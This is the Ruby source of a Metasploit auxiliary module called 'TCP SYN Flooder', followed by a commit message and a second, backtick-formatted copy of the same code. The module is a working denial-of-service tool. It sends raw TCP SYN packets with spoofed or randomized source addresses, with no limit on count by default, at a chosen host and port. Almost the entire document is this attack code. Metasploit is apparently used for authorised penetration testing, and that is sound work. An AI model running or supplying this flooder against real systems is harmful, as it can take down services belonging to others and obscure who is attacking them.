metasploit-framework/modules/auxiliary/dos/tcp/synflood.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'
require 'scruby'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Ip
	include Msf::Auxiliary::Dos

	def initialize
		super(
			'Name'        => 'TCP SYN Flooder',
			'Description' => 'A simple TCP SYN flooder',
			'Author'      => 'Kris Katterjohn <katterjohn[at]gmail[dot]com>',
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision$' # 03/13/2009
		)

		register_options([
			Opt::RPORT(80),
			OptAddress.new('LHOST', [false, 'The spoofable source address (else randomizes)']),
			OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])
		])
	end

	def rport
		datastore['RPORT'].to_i
	end

	def srchost
		datastore['LHOST'] || [rand(0xff), rand(0xff), rand(0xff), rand(0xff)].join(".")
	end

	def run
		return if not connect_ip

		sent = 0
		num = datastore['NUM']

		print_status("SYN flooding #{rhost}:#{rport}...")

		while (num <= 0) or (sent < num)
			pkt = (
				Scruby::IP.new(
					:src   => srchost,
					:dst   => rhost,
					:proto => 6,
					:len   => 40,
					:id    => rand(0xffff)
				) / Scruby::TCP.new(
					# We could use a privileged port here
					# since we're root using a raw socket
					# but it doesn't really matter
					:sport => rand(0xffff - 1025) + 1025,
					:dport => rport,
					:seq   => rand(0xffffffff)
				)
			).to_net

			ip_write(pkt)

			sent += 1
		end

		disconnect_ip
	end
end
add a SYN flooder aux module git-svn-id: file:///home/svn/framework3/trunk@6337 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-14 00:14:36 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`

			`require 'msf/core'`
			`require 'scruby'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::Ip`
			`include Msf::Auxiliary::Dos`

			`def initialize`
			`super(`
			`'Name' => 'TCP SYN Flooder',`
			`'Description' => 'A simple TCP SYN flooder',`
			`'Author' => 'Kris Katterjohn <katterjohn[at]gmail[dot]com>',`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$' # 03/13/2009`
			`)`

			`register_options([`
			`Opt::RPORT(80),`
			`OptAddress.new('LHOST', [false, 'The spoofable source address (else randomizes)']),`
			`OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])`
			`])`
			`end`

			`def rport`
			`datastore['RPORT'].to_i`
			`end`

			`def srchost`
			`datastore['LHOST'] \|\| [rand(0xff), rand(0xff), rand(0xff), rand(0xff)].join(".")`
			`end`

			`def run`
			`return if not connect_ip`

			`sent = 0`
			`num = datastore['NUM']`

			`print_status("SYN flooding #{rhost}:#{rport}...")`

			`while (num <= 0) or (sent < num)`
			`pkt = (`
			`Scruby::IP.new(`
			`:src => srchost,`
			`:dst => rhost,`
			`:proto => 6,`
			`:len => 40,`
			`:id => rand(0xffff)`
			`) / Scruby::TCP.new(`
			`# We could use a privileged port here`
			`# since we're root using a raw socket`
			`# but it doesn't really matter`
			`:sport => rand(0xffff - 1025) + 1025,`
			`:dport => rport,`
			`:seq => rand(0xffffffff)`
			`)`
			`).to_net`

			`ip_write(pkt)`

			`sent += 1`
			`end`

			`disconnect_ip`
			`end`
			`end`